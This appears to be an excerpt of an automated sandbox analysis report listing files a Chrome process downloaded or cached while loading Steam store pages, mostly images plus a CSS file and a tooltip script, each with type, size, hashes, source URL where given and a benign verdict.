        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 616x353, components 3
        Category:dropped
        Size (bytes):88634
        Entropy (8bit):7.980175995284883
        Encrypted:false
        SSDEEP:1536:EeIMMSxCAfzsUI2XTifeF5VF0yHie76KxCM28s/2HCC2ckbB1NZflGUjTzlIT:EzsLY2XUKVFXCKxC93ckd1NZf0UrGT
        MD5:FB9B430090CDA57836038617EA9234E0
        SHA1:5849554A011FA4C2A64C29F242C2FC41D09F918A
        SHA-256:C163DE7A0F2AE775CACAB38978B022324307845C050D365593CED6E86AC44F3B
        SHA-512:8E01D8849856D706ABB7F375DDB9240DDA572E1C2D410009C8B66BDCD96B2818C41135A501C1BD799D8002EE95A349345FF9D062A2A484A870C984A2347B2D8E
        Malicious:false
        Reputation:low
        Preview:......JFIF.............C....................................................................C.......................................................................a.h.............................................q...........................!.1A."Qaq.2....#B...3Rr.b...$45t....%8CGSsv..........&UWcdfu.....()7DTVg.....9E.......................................S........................!1.A."Qaq...2.......#3BR...4Tbr....CSs...$&Dc...56dt.%...............?.......T.d.B.._^.K]P.X...K..In!$...K..$...%.^..E|..-J.!'B....2....!\\:d.7$C..~.s...H..e.(.r:A..e.CkN.)Q..v0..*.?8R.|..[..s.w...sa..C..S.%W...D.`....).F...`.j3\..$.J.%..\.j.q{.......|e..."..~B.....!......2....L.S.....C.......Q.v{.. .mC...La.4...\..8..sk;*e....%;._.B. ....W.:.....w..q..'..].....w..k5*s...S.%j.*q.d...l..m.Z.8...B..+..4........s..F.&.......}......8U...it.{.zVE../....5........D.%.X.T..C.y...?.d.8.6us..h6..j......)Y<..C...v..$..g.yDB..!...J..v.K0M...d.V..=&.1N..XJ.......).an...R...0RI..D|a.'."...$(.p.I.E
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with very long lines (3866), with CRLF, LF line terminators
        Category:downloaded
        Size (bytes):13044
        Entropy (8bit):5.924935656195783
        Encrypted:false
        SSDEEP:192:BjCJ1PHyS2y9SZ/pUg39190KstqmJqG7XOyxJl3eRjJbnXujy70djyC6XDHpCJi:BjCJNHN6d3/j7SV7HJpeRhnXB0kXrpV
        MD5:66FB086EDE64D26D59ED10A5CE6FC68E
        SHA1:5A10C58203A731B303C5EE732210E64FACFDFA44
        SHA-256:0A5D672B31530F3F60D2069DDF3A4C81F39DB7EFD7413E12A7D43091AF344C44
        SHA-512:727469B95B87CDE051483ACF7C8E004DC0E8EE6301E326C1411C6F78CDDE6009D0E3733E843A09CC20C170E44A46920CDFFE0AC42FBA27B240B8EFE9ECCB9E92
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/shared/css/store_game_shared.css?v=ZvsIbt5k0m1Z&l=russian&_cdn=cloudflare
        Preview:.....game_area_description ul {...color: #acb2b8;...margin-left: 16px;...list-style-type: square;..}.....game_area_description ol {...color: #acb2b8;...margin-left: 20px;..}.....game_area_description ul li, .game_area_description ol li {...margin-bottom: 8px;..}.....sysreq_contents {...margin-top: 10px;..}.....game_area_sys_req,...album_metadata_chunk_contents {...font-size: 12px;.....font-family: "Motiva Sans", Sans-serif;....font-weight: normal; /* normal */......}...game_area_sys_req_full p {...margin-bottom: 10px;..}.....game_area_sys_req strong,...album_metadata_chunk_name {.. font-family: Arial, Helvetica, sans-serif;...font-weight: normal;...font-size: 10px;...color: #bcc6cd;...text-transform: uppercase;...display: inline-block;...margin-right: 4px;..}.....album_metadata_chunk_name {...padding-right: 14px;..}.....game_area_sys_req ul {...list-style-type: none;...margin-left: 0px;...line-height: 18px;..}.....game_area_sys_req ul li {...margin: 2px 0px;..}...game_area_sys_req u
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 600x337, components 3
        Category:dropped
        Size (bytes):72955
        Entropy (8bit):7.972738193465283
        Encrypted:false
        SSDEEP:1536:hU5bxz99VUYs5gCRE1UrAks7vBwij2njCW2ZIREcwdXVq1e:OPPSYs2jeAksA2DZI2jZVqk
        MD5:8913ED0F4051FAAAE14E41AB7FC4D40F
        SHA1:079C03BE40ED3D977719330CEBAF0F376683ED11
        SHA-256:57A2361D69A0C5DD1D61EBCB0A83C131B79A7A6E7C2E838747F7AFA8800E07CC
        SHA-512:DF2FF965C901F794DCF15AA5402198038AA3410780DF33A51C684C9BD09F6105510203FDCB4199AEE0AAFC9903F0E277EFAD208CC9E6264CC5F0C33BCB30574A
        Malicious:false
        Reputation:low
        Preview:......JFIF.....H.H.....C....................................................................C.......................................................................Q.X............................................P..........................!1A..Qa"q...2...#BR..3br...$45.....CScs.6....%&Dt...................................:........................!1A.Q."aq.....2...#B..3R...$4CSr............?..}..........q!m".$..Y...Yd..C..@...N)v5 . .zP9..4.l%9.9......O.y.G..-.....e...F.)g..%.!..9....>..UYg...5.E......d.>.E...J1..}.6).8iP..F)o#Do..i..>......p.)..T....c>.jc.*.*.4~ dj...d$..T;./...X.;./..9..}(.Bh....T.:......m...N.v...F.N.u...)....Y....@/.M>,....(s.*.b.@.....#.M:"d.]..9...\:rEy...iaI..t[.."QMS8.....N....3.Ve%>R.U..S.....91.e.l.z\"..,..4......>...>*)4J 9.}.*.......S...QF.q..OC.....4Ch.............g.WQ.|0.....a..:.t5.u.......D......WQ.pb..SGY.1..".v..i....]d@.67Fm1|.^......."....\y.O........Jc...$13...rR.)....6...x...}j".....t..,zn.e{N\..4..L)/[..8p.e
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:MS Windows icon resource - 5 icons, 16x16, 32 bits/pixel, 24x24, 32 bits/pixel
        Category:dropped
        Size (bytes):38554
        Entropy (8bit):7.281917544628079
        Encrypted:false
        SSDEEP:768:PcaDYrV5KBau+3erpKn9jpe7z9mWAFjQcR4D9DQ0LKfjLh:PcsiV5Y+erc9T/H4f0jLh
        MD5:231913FDEBABCBE65F4B0052372BDE56
        SHA1:553909D080E4F210B64DC73292F3A111D5A0781F
        SHA-256:9F890A9DEBCDFCCC339149A7943BE9AFF9E4C9203C2FA37D5671A5B2C88503AD
        SHA-512:7B11B709968C5A52B9B60189FB534F5DF56912417243820E9D1C00C97F4BD6D0835F2CDF574D0C36ECB32DBBF5FC397324DF54F7FDF9E1B062B5DBDA2C02E919
        Malicious:false
        Reputation:low
        Preview:............ .h...V......... ......... .... .....F...00.... ..%............ ..R...D..(....... ..... ..................................u...t...w.H.z...|..}...}...|..z...w.I.t...u...........p...f...e...j...k..k...l...m...n...n...n...m..j...e...f...q...Z...Y...]..._...w6...T..{;..`..._..._..._..._..._...]...Y...Z..~K...P...O...{I............P..R...S...S...S...S...S...R..~K..t@.I.Q!.{T.....................M..zF..{H..{H..{H..{H..zG..yE.I..................................zJ$.m9..o;..o<..p<..p<..o;.........................................eM.p@$.c0..d0..d1..d1..............xP<.g9#..hW..........................~o.],..Z(..Z)...j].a7$.P ..O...P ..O.....v..........................dV.O...Q"..F...H...I...I...I...H...Q&...........................H...I...C...C...C...C...C...C...@....rg.......................C...C...?..I>...>...>...>...>...=...Y:*.....................x^Q.<...?..I=...:...:...:...:...:...:...9...mUG.............ti.=...:...=...7...7...6...6...6...6...6...6...4...@%..R:
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 37x37, segment length 16, baseline, precision 8, 600x336, components 3
        Category:dropped
        Size (bytes):75786
        Entropy (8bit):7.976535150016609
        Encrypted:false
        SSDEEP:1536:iX+oXnB8wFhOGbvv8eTmyAnC+UaxHZw0fMdBaxe5p94JJuxgYYKx4fs:ihXB8wB8G+j3VuMxPJKOHs
        MD5:0F1B5A9BE61C0A9B13479CFD7533B395
        SHA1:805F3A5A82EAA72E5656EB6817FF66A3AC905F6F
        SHA-256:DE0252AFF8D5D29C376FA06B059B454C8500098595220379B7E652EC3769B7FB
        SHA-512:982F847EBDF8046197407C5B5BC5F93FDAB77412D70A8C1F375A19C9D8DE1076791F13CDBE1AF71A23947E6F4EFCB2C3622471D9EE5348694C42D7BC568460FB
        Malicious:false
        Reputation:low
        Preview:......JFIF.....%.%.....C....................................................................C.......................................................................P.X............................................g..........................!1AQ.."a.2Bq....R..#b...$%34CDSr....&E........56TUVcsu...'7dt..FGe......W...................................H.......................!1..AQ.aq...."R......23S.#4Bb..r.$C.5...T...%Dc............?...a.gi...e..%A.."....ks.>........Q.ei+2.@..~a.`..<....J..../.2bp.1.F.w....i.c+....n..3.X..U.....>........~...../....r..^._m........c.m|.<.%..]q.U..=...O....mr....U..1...f.....ee.....irH......<4*T...<.Z$yl~....8R......1.n..E..G..............1.p\}b....G..\........~..:^..mTh....,.M.KPBT....c.;V.....-.Eiw..v=...K...Z.7..P*}..].L.i...Z...BH......=..b`....y......q...%........L90..ydfQ.....H....ZNu(]...d...{..H..5...a..Z.(Am$[.j.....)Y...'......%.;-..j.~Z...S....../p>">}..8...;w.....u...m_..o....u..>.B..m.......J{.....]....q.nJv].~....Q.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 71x71, segment length 16, baseline, precision 8, 600x337, components 3
        Category:downloaded
        Size (bytes):49348
        Entropy (8bit):7.983823650603006
        Encrypted:false
        SSDEEP:768:+5emD0fcQGRI40hnWQ4krs1zQkmNdRsBHrdIA2ZjFXzHVnMmcBO3s:+omaWIVWvkiAsHrdxepj2O3s
        MD5:2D4F4E7802EEB96F68ECEDCF573200D0
        SHA1:EA55CB097141E919D767A8546A195CBA6B945863
        SHA-256:0EDC748CBDD71CDA9901154F55AE5E4689BEFCA7A8A5510C10AE8336CA468A1C
        SHA-512:49D3AC0E65800475FEB08C7A98E2123627A4037FAB8DAC357C8F7A29B5F5ADB43B98638D3F8168FD0AD58E3B9E1DAA31D90E9B38B7B0235A9B384318738C6F58
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/236390/ss_368c7b4cd154237e7a635fbb733f6abdcc2b81ee.600x338.jpg
        Preview:......JFIF.....G.G.....C....................................................................C.......................................................................Q.X..".........................................U........................!..1.AQaq.."..2B....#3Rb...r...$4Cs...56S.Dc....7t..%&Tuv.................................-.......................!1A.Q."2aBq..#R.................?....ku5.J.N..{g....R!.hu;..3...do.:.p:.z&6..........Y.6.5].B(..#...e...<9.Y..|S.....9....Q.4....\W.O...We.m..j|?mqj.i.f..'sK.r.b...&.N.iN...j~...6...v....l.*S.q`..=H.j../..l.......+.s.G~..).....i..d..@.u,..>.4.r.o!....U..Td.u./l..8UV"..Z..O.e..*....NX..[.Po.J....J....t^..1Z.......H..N.e...../.jtZ...%b..>-BA...O.D......r.x...............$...;..z....6..^2.vL)g.......d..}(.q.F[..:oSqTtG,..X.u)Q1.H.lS..;.....U.......J..^\.4..N[..h....T/...,1L..W.a_...;.|.x..,.]...{..,|*I.{8..v.......zP.e.~'$y..k.m..d...L...mA.....QG.3.:...A.+k.T.`..H....H...(...:b.Q.*,....`.t.'.K...yzT...b@...
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 184x69, components 3
        Category:dropped
        Size (bytes):3149
        Entropy (8bit):7.767927625415787
        Encrypted:false
        SSDEEP:48:vozjUQ9Ulm0gZIbyhc4uHvEk4y4vkqzA+7a1Qwg1yDCGnlHPQZ:QzYQ3yLzHv4P8nk1yDCGlHPQZ
        MD5:49070C5878D6755F571686741BDB1696
        SHA1:3C6EFCC5BB3E5B09F97B4C498A6895F32384BE81
        SHA-256:F560C50EC9C260E76FEFC066C174A318CACE6734D097340AFD05BD893EEF15D0
        SHA-512:0AD0D2A3DE7DDA04CE1117E7C31D4EB1787C261500490C2640335ADFB5D89848CFF6728BADF874A036C34F45EE687B0284EA09B95A7C044A9B06BCB71B86ECD1
        Malicious:false
        Reputation:low
        Preview:......JFIF.............C....................................................................C.......................................................................E..............................................3...........................!.1A."..Qa2BR..$%3q..................................1........................!1A.Q.2aq......"..3B#b.............?.......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(...*.....)=E..P..@(......P..@T!G.......P..@(..?w]...Z..$.C.2.K.,o.R..".8o.Y......C.Y.X..1...~...a.r.,L?.).....H.BS......]6.*...eI.Y.8..]]..iW..y.n+n......>.8.....k...m.[..K..).A.^G....IKCD...s.q..v.l.Z.....ci.c....{...S...%.8....)$..........O.RI)4H7.5.|o.......rALhL..-......<...J..l...Y..,...P.#)7.w.}=7`...i.x.#..(..s!..w..i..V.py.....5..BQ.8.}=..8.y....a........q........2.&C...P@..%J..........uq.%..s\..7........#....~..F[kQ.c..D..J.....e(.(..n.Qr.k...^.."P..p....a....P....m6.nl.Q.u/..S..Q.....^.b...p.....,.5.b....[-...q.Jm......XN.>...js.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:GIF image data, version 89a, 1 x 1
        Category:dropped
        Size (bytes):807
        Entropy (8bit):0.4261982118465057
        Encrypted:false
        SSDEEP:3:CUlFE/xlzeze:zFEGze
        MD5:39BC952559E5A8F4E84BA035FB2F7390
        SHA1:4F415467396B4A50149373CA75BCB4C04C2F60B6
        SHA-256:8F73EF54EFC672061F69CA881FE318DCCC6DD67D993CBB8E76E53E52C84EE493
        SHA-512:C7E107E803941A965A173EC8DC7DDFB052C042AB0070E92E5FF47D0E02ECB38446BDC13BBF201D68B2F5696AFBEEA1AF494A65EED4B086EF368CF147892E4409
        Malicious:false
        Reputation:low
        Preview:GIF89a.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................!.......,................;
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 115x65, components 3
        Category:dropped
        Size (bytes):4211
        Entropy (8bit):7.886769133631847
        Encrypted:false
        SSDEEP:96:vpOASHOT12Dt2aZsCOfoFnEiZ+A1qmK/yM:BSkcAaiAhXZ+AVlM
        MD5:E51E58E7339247433AD856178100168D
        SHA1:36DD988DDCB3F46C77F190831B986ED83EE2F022
        SHA-256:30D24E4C4E938213A76DD2DFD93A21F9ADD1E19345E93A14F2C5D53F933FC262
        SHA-512:13290503DA4308234D539B3383D77F143C79A8DA0E0F1888AFC7ACD44A5F7964B5E08421544769C2FE699A26F1817F7F10CABC849CE64193334B8A384843624B
        Malicious:false
        Reputation:low
        Preview:......JFIF.....H.H.....C....................................................................C.......................................................................A.s...........................................B........................!...1.AQa"q..2..$35r...#46Bst......Rbu.................................*.....................!..1AQaq."...2BR...............?.jQ[.H...U..F1.v.4..G..:..7.g...y)LNB.H..M..#..e%..5..V...I...\m..4.'...MSj.,.].2...g'...=.Fq.(.<....7C.7X.r..4....u.,..)P.9...y.mb.n1i.t.f..*../v.w.x.U.k.....a.F%u...F.m...S..wn.....*)...".zn)..aryk$.L.T...v$#c.~G..M.O.2..p...)"J.....iy.3..'.5e.. ..Vn..5.2E......)...r........Q|.!.....9k..n.w...'U ....?.H..lk$....'....|[Yb..-.l.KMU..G...|...d.c...N..M.......,.k........&..ET.z..*.....F....z..t.>:....T...)..jKR0....l....PH..T:lU......T..._.N..I.6........$...:_...v.c.{..S=4.p.t.p..{.....\...lU..QQ45.T....jd.2.U..q.dc...=N)....D1...CZ..MM.jd.RR,.)8?.I...3S.,...Y...`."id....)..,C..O..}..V...7x%p....mR[#..;}.J.hyd
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 115x65, components 3
        Category:dropped
        Size (bytes):2704
        Entropy (8bit):7.791683215638868
        Encrypted:false
        SSDEEP:48:v9j+rILNX6hGc3rIqSY1b0bqzYZyM6D49WF9XxK2cQoBQNungFmmB:vFNqhX7IroblApouWFDrBNUgFDB
        MD5:DE9B34702986AA4D4274E09A8D5F4F9D
        SHA1:1A9B9D65F55DB65AB404D07DDA348C398013276F
        SHA-256:3A885981F1021B41428190B12F8952996BC23A991770C27E69069028E6F2958B
        SHA-512:1A31801543F171CE4C93A063DE29A97E34FBBFE037558BB40433A2E67DE504AB97C81D37BB341388A1CB01FFBA0A362EBABE6232DD3D5BF1E7A48C2D8A1B1859
        Malicious:false
        Reputation:low
        Preview:......JFIF.....H.H.....C....................................................................C.......................................................................A.s...........................................;.........................!1A.."Qq...#2a..34Br...$b..CRs................................&.....................!1..AQ...."Baq.............?......a.:.!..u,.F.~i...X..#...>b.l.....2s.#..UG+.G%.*.i..{9....7....W.t....../..~.msK.E1.#%.u..U...?....S'.l...H...a\2..o.#.e....R.U....Y$.0.......Aw.}.\..E)UD.YH._.....]...=.4.u...5fN..'...R5..o.)Pp^.y...w..t..J.O..@..(G.OC.h..`.....{U..Z.gko..$v..[.......I..(F.m..Y.[A.e..L.9...4........&.4.o..<...c.[...l..?.[.6.L."M(...r..).~.#4.m.on.2.. ....c$eur//..[........+gL?jy..<.g.A..(.....=...+P.R.xP>U.6.......*.....n8.P.=.U..J.u...K...=Y+..).-.)'..v.....J.v..J....A c...L...V...z..Tf.F.n.T....'.|.S8/N.I....ci.r.2.p..|.....t<c.?.kV,d....'[. ...;U..O~.4..^.......{BO.X.Af..x..'.[c..V..../.d.n[w...(..%c.4L..D..5.L........e&
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 292x136, components 3
        Category:downloaded
        Size (bytes):17833
        Entropy (8bit):7.962302476292767
        Encrypted:false
        SSDEEP:384:Im0QBETqaAhl+oW98EUFpAWRDLscFeVBg3YyXjmigdlxSchkz:Im0QeTqwL9UFPRDLjFeVBKYyCignxlE
        MD5:6A85743E03257D77A48C33CD8BD9F84F
        SHA1:9D3B0CF721F08C96CCE0B34347296D928807E4A0
        SHA-256:316048C2D853A77D174D425B603ED3DE3CAF17F0984326A533039F069EF7E928
        SHA-512:C59FA23AFB2B68A19766CCCDB0A14E3BD7D6C0D94F1D5B95056C78B79ADE07582939AC7F7E20E4903A2B3B5E7C56D02351EBC8BCC48D3FD9C82CBBD8E17E3302
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/2325832/header_292x136.jpg?t=1714490198
        Preview:......JFIF.............C....................................................................C.........................................................................$............................................>.........................!.1.."AQ.a2q...#B..R.....3br$c..%C.................................7......................!..1.A."Qa2q.......B..#Rb..r$3.............?....m[t.L\:........_.Q}...:....xdb.R.....q.%z......Y.....%...0.J...G..}..H.nOs...C..E...O..v.._i$..I&t.\....a.f.[.T_.\.<.2.........]C..........}Li..._..;..*..kjf....*&b.K!.;..'\i%....8...6J.v..N.:H...g*..*(.....(....Z...]...8.n..4.......Snh.#.P....*....JV3..KN.hi.(.............w'R.@.>....@.:08BZ.... .>.i.4^xV.D...7H\....3.k.e).C...7..^...).*.m..J.V..:).;....w...?-U-.Z.I..E<............Zw.T&ak.wE..B...c.d.w..W..gGh....2E.d-.v...{.,..)R0Go}.$....8.A.).B...K18..I..I..:....!..n..:D'o.....o......d.'..........d])].??.C.a.)%.....'..1)#.3...T{H.1!P1.)V.....}..e..5L..eE.f>.jH`|...,.....<G..W..9......@.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 616x353, components 3
        Category:dropped
        Size (bytes):60437
        Entropy (8bit):7.980043744068461
        Encrypted:false
        SSDEEP:1536:wRec0QtiFeq28GxHp+Ngpy4elcMbW1WMyJKy9DJSZKjEkxWpNBOI:SviFetXp+NN478lBXdSZKjEaWj
        MD5:89D078E4902702716B4F280E115A791F
        SHA1:D47CE618A19D07C8D052909C1BFF96A0FC5C47D1
        SHA-256:E1CDC501A00A2AD31744F6AE894AB824C0B8E4D8FA430E5A479AD57F84F8A978
        SHA-512:47DC942A95105963658799335E728B97AC05142012F09FEBC212F1CCE1A2B21540D09F1851BB53D01EE4BF107E147F6F574E80C66B89FEF63F9D30837789DB23
        Malicious:false
        Reputation:low
        Preview:......JFIF.............C....................................................................C.......................................................................a.h............................................H.........................!.1..AQ"aq..2R..#B...3..br...$4C...5..SsE....................................=.......................!1.AQa.."q..2......B..#b3..R$4r5................?.......n..9......@..7.?............M..&;....Q".s.....7?}......O..zv.....+....H....0.i.......`&[..N.P.?...J..gc...Zv.|^....fO..z,,pf.........?........@....1...............z.....o...7.o.Y.c~f...77.o......@.W.V?..0;.f...].....Vf.?3~.7..o.X...7.@Y...7.@......z@...............c.f...<......y.....vf......&.....afn.z...b.....3s.v..7..o.....;~........b.o...g........7.@.]..1...3{.f.........@..............O1..1.......]......<.#..v3.q....1.f.z._1..3~....G.............?.o...#..o.By.........7.@..?.o....~&....k.s...y......<.............,|..7..6..)...P..hFb..U.O -.......P#1.@...ON........
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:HTML document, ASCII text, with CRLF line terminators
        Category:downloaded
        Size (bytes):16087
        Entropy (8bit):4.969826359236833
        Encrypted:false
        SSDEEP:192:x32Mu4vUDjHbnZsXGWIS75sTY8M7ebb6qgrrY20jhN3MScuhJ05zb5jzCF+MlF+8:x32L4kzt3gtGb5LQqha31iUTSiq5N
        MD5:72938851E7C2EF7B63299EBA0C6752CB
        SHA1:B75196BD3A6F9F4DFC1BBF5E43E96874BCD9CE4E
        SHA-256:E2D4E0E1D3E162FDC815F16DFFF9AE9B0A967949F0F3AE371F947D730A3F0661
        SHA-512:2BB6C03A1335EF9514D0D172A4284D82A29D1783A72306BDCB8AF3185D5CD2FF16303355AA4B05086D2FA0B5B7C7159CFA67DE4A6175095FF0E68ADEC2A56AC1
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&_cdn=cloudflare
        Preview:/* Requires jQuery.. *.. * This plugin will create div.jsTooltip elements (or configure your own!) in body for every tooltip on the page. Some.. * basic CSS is applied automagically, but you'll want to style it on your own from there. This code will be applied to.. * every element in your .v_tooltip() selector, so giving it a common selector like '.tooltip' is ideal... *.. * Options:.. * - location: Where the tooltip should spawn in relation to it's parent.. * - offsetN: How many pixels to add.. * - trackMouse: Should we track the mouse cursor instead of the parent?.. * - suppressOnClick: Should we hide if a user clicks the target?.. * - suppressWhileToggled: Should we ignore events if the target has the 'toggled' class?.. * - tooltipClass: css class to apply to tooltip elements.. * - fadeSpeed:.Time (in milliseconds) to spend fading in/out. Set to 0 to disable... * - allowHover: Should we keep the tooltip open if we mouse directly on to the tooltip? (Your tooltip will need to spawn in
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 600 x 240, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):238328
        Entropy (8bit):7.987992499352493
        Encrypted:false
        SSDEEP:6144:PYkpKXRazWnn8dCjrGV2ToCRGlBR5qqSEmKZrir3cBcd5IyI8J8f9ek2/p7:PYkpXzWnpGYULBR5qqXmKZreJTRIl9eL
        MD5:E916B27C0E8B0C3D8F627154B140DE1C
        SHA1:C26A4D6A8F974AE7134D2FC5478CB3A7A51E7FFF
        SHA-256:8C6E8B2631C900B26818A5BB8D3390C080934AF0A9F2E95A48137ECB3C55F938
        SHA-512:0F4C78B18471A83615F2175C280E0994F3D5DFFB9F89DBCBD45384A69069AD18203916B8CB4D4D1EC6441E86BA50F0BCEA3FFF43192099B71CC715E69D832891
        Malicious:false
        Reputation:low
        Preview:.PNG........IHDR...X...........v....pHYs................)iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c006 79.dabacbb, 2021/04/14-00:39:44 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmp:CreatorTool="Adobe Photoshop 22.4 (Windows)" xmp:CreateDate="2021-08-02T17:48:06+03:00" xmp:MetadataDate="2021-08-03T14:23:47+03:00" xmp:ModifyDate="2021-08-03T14:23:47+03:00" dc:format="image/png" xmpMM:InstanceID="xmp.iid:eb4bdb4e-d6ab-4544-be70-fee626437ece" xmpMM:DocumentID="adobe:docid:photoshop:1954406c-28a1-9743-9d7e-b74bba17eaf2" xmp
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 292x136, components 3
        Category:dropped
        Size (bytes):20054
        Entropy (8bit):7.97037734054312
        Encrypted:false
        SSDEEP:384:M3sUMbUIvR5x2+sn4f/iGbqF0mQFFbVZFwEk2UWA9Fc6+ZCO4cCw1qr+Z5K:P1bZvbx9snEiWNmaFbiJ2UN26cCqa+ZM
        MD5:DC1683C0E02EED41EC5E352E5B965FCB
        SHA1:A294519F48CE7A486ABD9E6F45A703497E2A0632
        SHA-256:853E44B712AD08C4ACD5B62B85D920ED8ECD504A58450704BB5E2A31A01111F2
        SHA-512:2FB4BCC7FAA9399BD1EC382AF3DDEAE8D9A39FF15EC3D9A32F5965875183A8429F0A4434814859C8B4D74AFE3C967CD519DEC31EFE4D3B40BFC95F94ECCA42FB
        Malicious:false
        Reputation:low
        Preview:......JFIF.............C....................................................................C.........................................................................$.............................................K...........................!1..AQ."aq.2..#B.......3Rbr..$4..%CD...&Efs...................................8.......................!1.A.."Qaq.2........#.R3B4br...............?...7Q......R.0?....3.6..".Z.......(..=..8....p:.`...o.|..3.>&..vu.....S.m......$..&.T.X.o..(ebB!V...*...:..d.=...n4.........).7*.....\g.N;.Q.t..;....h.7;...d...W$e...Q....9rz.]swh]nI....Ivk..tp..V|=.^wY%X.y..P~`.)..t.L...El)..ZVn-..(g.. .....FYt(..X..r....3......9..rax[.>RM.....]......X...v.l.r...L....&...8./.I..d..g..q.z....7RC..X5.....A.I*3..q.5.*r]...Nz.=.Ev..KS..M..U.... .}).I..v.c...hm.L..W........../p.....;P....T..f...qWP....@:...M.lfH..mY.j..U.....\......9':|....V.z......~......S.N;&L.,...U.H.R..^l...N5.t..s..+}.h...>...q.uj.63s`..V&.K...:...eK..oJ.p.M
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):1161
        Entropy (8bit):6.483902966293242
        Encrypted:false
        SSDEEP:24:2C1hkyaWwjx82lY2T3RVNxhpyJ3Vlt8vmG8ll6f7iX:HZNn2lPzoJ3PtQmBY0
        MD5:E406E5A22E4F3CFA580D3BB57420150E
        SHA1:5B381E535BB0CE6003A461F3124FA1238DFBCEDB
        SHA-256:760589F903C5E9BD169B38F941F9A3DC88A23897E9CC5B622D3D91F5C204B9E4
        SHA-512:E33CB7BD10104A1E8C2D3F2B3885D65EF3769F7250445C8341D6D2AD2367749CCDC48DAABE4EA39CB80EE0362AF9D01E48370DB858BA01F956A1A6B8C04217C1
        Malicious:false
        Reputation:low
        Preview:.PNG........IHDR................a....tEXtSoftware.Adobe ImageReadyq.e<...'iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.1462899777, 2023/06/25-23:57:14 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 25.1 (Windows)" xmpMM:InstanceID="xmp.iid:399EA8C592D411EE91E8F6773DB0009B" xmpMM:DocumentID="xmp.did:399EA8C692D411EE91E8F6773DB0009B"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:399EA8C392D411EE91E8F6773DB0009B" stRef:documentID="xmp.did:399EA8C492D411EE91E8F6773DB0009B"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.d......IDATx.b..U.d``.......@...4.....0......PWU.p..Q....1\=...2I.\Fg.&3de.....BX..4 ...L...!#....... )!..7m..
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 616 x 353, 8-bit/color RGB, non-interlaced
        Category:downloaded
        Size (bytes):318017
        Entropy (8bit):7.998180592739449
        Encrypted:true
        SSDEEP:6144:9H2k2Q7RkNSrgoh6HkM6cWU1/K4/BFIHiXi6+UYlXreQukI+J88AO/4AF04:FvPllrgg6HkM6D4/RoiwUYlXRX88//4A
        MD5:5CA954104D3C682BAD2E7F379F648493
        SHA1:80AF003E382C838E855BDE0CC63C84C82D925B2F
        SHA-256:B0F12FB11BC8F87B4DA0F3CC916D59F8350EDB5FB587F55AAC0608496D2A2F59
